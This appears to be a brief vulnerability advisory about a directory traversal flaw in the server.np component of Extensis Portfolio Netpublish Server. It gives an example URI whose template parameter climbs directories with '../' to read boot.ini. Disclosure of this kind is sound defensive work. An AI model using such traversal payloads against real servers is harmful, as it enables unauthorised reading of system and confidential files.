Extensis Portfolio Netpublish Server Server.NP Directory Traversal Vulnerability

Extensis Portfolio Netpublish Server Server.NP Directory Traversal Vulnerability

No exploit is required.

An example URI has been provided:

http://www.example.com/server.np?base&site=XXXintra&catalog=catalog&template=../../../../../../../../../boot.ini